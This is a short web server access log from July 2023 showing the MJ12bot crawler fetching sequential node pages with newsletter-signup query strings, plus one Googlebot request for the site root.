65.108.78.33 - - [03/Jul/2023:04:48:28 +0200] "GET /node/166?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:48:39 +0200] "GET /node/167?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:48:49 +0200] "GET /node/168 HTTP/1.1" 200 6131 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:49:00 +0200] "GET /node/168?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:49:11 +0200] "GET /node/168?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:49:21 +0200] "GET /node/169?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:49:32 +0200] "GET /node/170?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:49:43 +0200] "GET /node/171?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:49:53 +0200] "GET /node/172?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:50:04 +0200] "GET /node/173?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
66.249.75.64 - - [03/Jul/2023:04:50:09 +0200] "GET / HTTP/1.1" 200 4123 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.179 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.108.78.33 - - [03/Jul/2023:04:50:15 +0200] "GET /node/174?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:50:25 +0200] "GET /node/175 HTTP/1.1" 200 4905 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:50:36 +0200] "GET /node/175?q=signupformailinglist HTTP/1.1" 404 4060 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:50:47 +0200] "GET /node/175?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:50:57 +0200] "GET /node/176?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:51:08 +0200] "GET /node/177?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:51:19 +0200] "GET /node/178?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:51:30 +0200] "GET /node/180?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
65.108.78.33 - - [03/Jul/2023:04:51:40 +0200] "GET /node/181?q=signupfornewsletter HTTP/1.1" 200 4719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
